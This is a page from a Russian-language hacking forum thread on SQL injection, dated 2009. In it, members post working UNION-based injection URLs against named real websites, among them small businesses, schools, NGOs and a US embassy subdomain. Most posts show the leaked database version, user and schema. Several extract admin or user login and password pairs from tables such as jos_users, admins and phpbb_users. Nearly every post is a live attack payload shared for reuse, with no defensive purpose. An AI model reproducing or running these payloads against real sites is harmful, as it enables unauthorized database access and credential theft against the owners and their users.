SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. br1tva

    br1tva Elder - Старейшина

    Joined:
    26 Dec 2007
    Messages:
    23
    Likes Received:
    8
    Reputations:
    -5
    http://www.sbrshop.com/store/maincategory.php?maincat_id=-1+union+select+1,username,3,4,5,6,7,8,9,10+from+users--
     
  2. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    Code:
    http://www.skylinechili.com/st.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6
    5.0.45:skyline@localhost:skyline

    Code:
    http://www.car-stylingparts.com/Show-St.php?id=-6+union+select+1,2,3,concat_Ws(0x3a,version(),user(),database()),5
    5.0.77-community-log:carstyl_newdbs@localhost:carstyl_newcardb
     
    #9882 AlexSatter, 19 Jun 2009
    Last edited: 19 Jun 2009
  3. Dj-Matrix

    Dj-Matrix New Member

    Joined:
    7 Nov 2008
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Microsoft SQL Server 2005
     
  4. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    http://nl.sharp.be/php/td.php?par=1108_519_no_1718+and+substring(version(),1,1)=5

    Сузуки оказывается тоже весь в sql-inj :)
    Code:
    http://classic.suzuki.de/code/td.php?id=-2006101+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11/*
    5.0.32-Debian_7etch5-log:suzuki@localhost:suzuki

    Code:
    http://www.martin-rowe.com/a.php?id=-38+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6
    4.1.22:martinrowe@localhost:martin

    Code:
    http://www.uaz-upi.com/news/art.php?id=145+and+substring(version(),1,1)=3
    Code:
    http://www.endocrin.ru/art.php?id=-430+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5
    4.0.27-log:[email protected]:endocrin

    Code:
    http://catalogue.nimk.nl/art.php?id=7231+and+substring(version(),1,1)=5
    Code:
    http://www.medoded.ru/art.php?id=-72+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9
    5.0.32-Debian_7etch10-log:med@localhost:medoded

    Code:
    http://me.net.ua/art.php?id=402+and+substring(version(),1,1)=5
    Code:
    http://www.brownsfineart.com/gallery/art.php?ID=-77+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10
    4.1.22:browns@localhost:browns_db

    Code:
    http://www.geopribori.ru/art.php?id=a138+and+substring(version(),1,1)=4
    Code:
    http://express.fa13.com/art.php?id=-17622+union+selecT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10
    4.1.10a:fa13_forum@localhost:fa13_add

    Code:
    http://www.infoservis.net/region.php?idRegion=3+and+substring(version(),1,1)=5
     
    #9884 AlexSatter, 19 Jun 2009
    Last edited: 19 Jun 2009
    1 person likes this.
  5. Flair

    Flair Member

    Joined:
    7 May 2009
    Messages:
    36
    Likes Received:
    13
    Reputations:
    9
    Code:
    http://www.propheticliving.com//index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*
    Code:
    http://www.shoprivergate.com//index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*
     
  6. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    [email protected]
    4.0.26
    nordhouseru
     
  7. Rednoise

    Rednoise New Member

    Joined:
    28 Mar 2007
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.38rus.com/more.php?UID=-4127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,version(),user(),database())/*
    5.0.45:nia-irkutsk@localhost:38rus

    Code:
    http://www.astafiev.ru/topic.php?UID=-120+union+select+1,concat_ws(0x3a,version(),user(),database())/*
    5.0.45:astafiev@localhost:astafiev
     
    #9887 Rednoise, 19 Jun 2009
    Last edited: 19 Jun 2009
  8. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    Code:
    http://abrionline.org/expert.php?id=-99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24/*
    Database Version: 4.0.27-max-log
    Database name: ABRIDB
    User name: [email protected]

    ------------------------------------------------------------------------

    Code:
    http://www.nepaltourismdirectory.com/nepal_travel_information.php?id=-99999+union+select+1,2,version(),4,5,6,7,8--
    Database Version: 5.0.77-community
    Database name: ntdirectory_ntur12
    User name: ntdirectory_dbnt@localhost

    ------------------------------------------------------------------------

    Code:
    http://www.sunbula.org/etemplate.php?id=-99999+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    Database Version: 4.0.17-standard
    Database name: sunbulashop
    User name: sunbulashop@localhost

    ------------------------------------------------------------------------

    Code:
    http://www.opusmaxim.com/news.php?id=-99999+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+tbl_user--
    Database Version: 5.0.77-community
    Database name: wei10194_opus
    User name: [email protected]
     
    #9888 beerhack, 19 Jun 2009
    Last edited: 21 Jun 2009
    1 person likes this.
  9. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    Code:
    http://www.osumensvo.com/news/view_article.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
    Database Version: 5.0.45-community-log
    Database name: 348781_vo
    User name: [email protected]

    Code:
    http://www.osumensvo.com/news/view_article.php?id=-1+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables/*
    this is all tables

    ------------------------------------------------------------------------------------------------------------------------

    Code:
    http://www.usajewelryfactory.com/states.php?id=-46+union+select+1,version(),3,4/*
    Database Version: 4.1.22-standard-log
    Database name: jewelryf_jewelry
    User name: jewelryf_jewel@localhost
     
    #9889 Skofield, 19 Jun 2009
    Last edited: 19 Jun 2009
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.arunima.edu.np/readdetail.php?type=highlights&id=-1+union+select+1,concat_Ws(0x3a,database(),user(),version()),3,4,5--

    P.S у меня сеня-завтра Днюха :D пьют все :D
     
    _________________________
    1 person likes this.
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://scaa.asn.au/consultants_directory.php?id=-5+UNION+SELECT+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--


    Database Version: 5.0.51-log
    Database name: lavarox_scaa
    User name: [email protected]
    Os : PORTBLD-FREEBSD6.0


    хотя все говорит о том что там винда..
     
  12. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.whr.org.np/event/event.php?id=1+union+select+1,2,3,concat_Ws(0x3a,version(),user(),database()),5,6,7--

    4.1.22-standard:whrorg_user@localhost:whrorg_whrsanwedorg


    http://www.nayagoreto.org.np/en/document.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5--

    5.0.67-community:nayagore_dbnewtrail:nayagore_goreto@localhost

    PS еще 1 час 20 минут и мне 19)))):D гуляют все
     
    _________________________
    #9892 HAXTA4OK, 19 Jun 2009
    Last edited: 19 Jun 2009
    2 people like this.
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.aimia.com.au/i-cms?page=37'+and+substring(version(),1,1)=4--+
    
    Code:
    http://www.sanrio.ru/page/page.php?pgid=-12+or+1=1+and+substring(version(),1,1)=5
    
     
    #9893 Pashkela, 20 Jun 2009
    Last edited: 20 Jun 2009
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.salon-medibat.com/fr/actualite.php?idact=-51+union+select+1,2,3,concat_ws(0x3a3a,id,login,pswd),5,6+from+medibat_users+/*+
    Code:
    http://www.poissonrougepictures.com/fr/news.php?id=-39+union+select+1,2,3,user_name,password+from+admin+/*+
    Code:
    http://www.akata.fr/news.php?cat=-4+UnIoN+SeLecT+1,database(),3,4,5,6,7,8,9+--+
    akatav2

    Code:
    http://www.obskure.com/fr/kro_model.php?n_kro=-2818+union+select+1,null,3,concat_ws(0x3a3a,username,user_password,user_passchg,user_email)+from+zenew_phpbb_users+--+
     
  15. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    http://www.euspro.com
    [email protected]
    aldakim_euspro
    4.1.22-standard-log


    http://yoga23.ks.ua
    olvi@localhost
    4.0.27-standard-log
    olvi_yoga


    http://yes.com.ua
    [email protected]
    4.0.27
    mypresent_db2


    http://apkonline.com.ua
    apkonlin_mpuser@localhost
    4.1.22-standard
    apkonlin_marketdb


    http://www.temp21.kiev.ua
    temp21_dbtemp21@viper
    4.1.22-log
    temp21_temp21


    http://www.finmarket.biz
    http://www.finmarket.biz/lib/detail.php?cat=1&rub=2&id=-395+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_ws(0x0b,user(),version(),database()),11,12,13
    usmdi@localhost
    5.0.27
    economics


    http://www.kotiko.com.ua
    http://www.kotiko.com.ua/art.php?art=-1352+UNION+SELECT+0,1,concat_Ws(0x0b,user(),version(),database()),3,4&cat=12
    u_stbnwAiN@localhost
    4.1.22
    stbnwAiN
     
    1 person likes this.
  16. Rednoise

    Rednoise New Member

    Joined:
    28 Mar 2007
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    peterhof.ru

    Code:
    http://www.peterhof.ru/index.php?m=155&subject=-2867+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x0b,user(),database(),version()),17,18,19,20,21,22,23+--
    [email protected]
    b23911
    5.0.67
     
    1 person likes this.
  17. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    http://budinak.by/
    [PR: 3]

    db info:
    http://budinak.by/popup-door.php?id=-170+union+select+1,2,3,4,concat_ws(0x3a3a,version(),database(),user()),6,7,8,9,10,11,12,13
    admin:
    http://budinak.by/popup-door.php?id=-170+union+select+1,2,concat_ws(0x3a,login,pass),4,5,6,7,8,9,10,11,12,13+from+admins
     
    #9897 InFlame, 20 Jun 2009
    Last edited by a moderator: 20 Jun 2009
  18. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.archkku.org

    Database Version: 5.0.51a-community
    Database name: archkku_archkku
    User name: archkku@localhost

    users:
    Code:
    http://www.archkku.org/link/template.php?id=-5+union+select+1,group_concat(username,0x3a,user_password),3,4,5,6,7+from+archkku_mb.users--
     
  19. ANUBI$

    ANUBI$ Active Member

    Joined:
    16 Jan 2009
    Messages:
    57
    Likes Received:
    104
    Reputations:
    1
    http://www.bobr.net.ua/articles.php?id=-20+union+select+1,2,3,coNCAT_ws(chAR(42,32,42),user(),database(),version()),5,6,7
    amrita_amrita@s11* *amrita_amrita* *5.1.29-rc-log
     
    2 people like this.
  20. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    brasilia.usembassy.gov

    Code:
    http://brasilia.usembassy.gov/index.php?action=recifemateria.php&id=-7914+union+Select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,0,1,2,3,4--
    embusa@localhost
    5.1.26-rc
    embusa
     
    1 person likes this.
Thread Status:
Not open for further replies.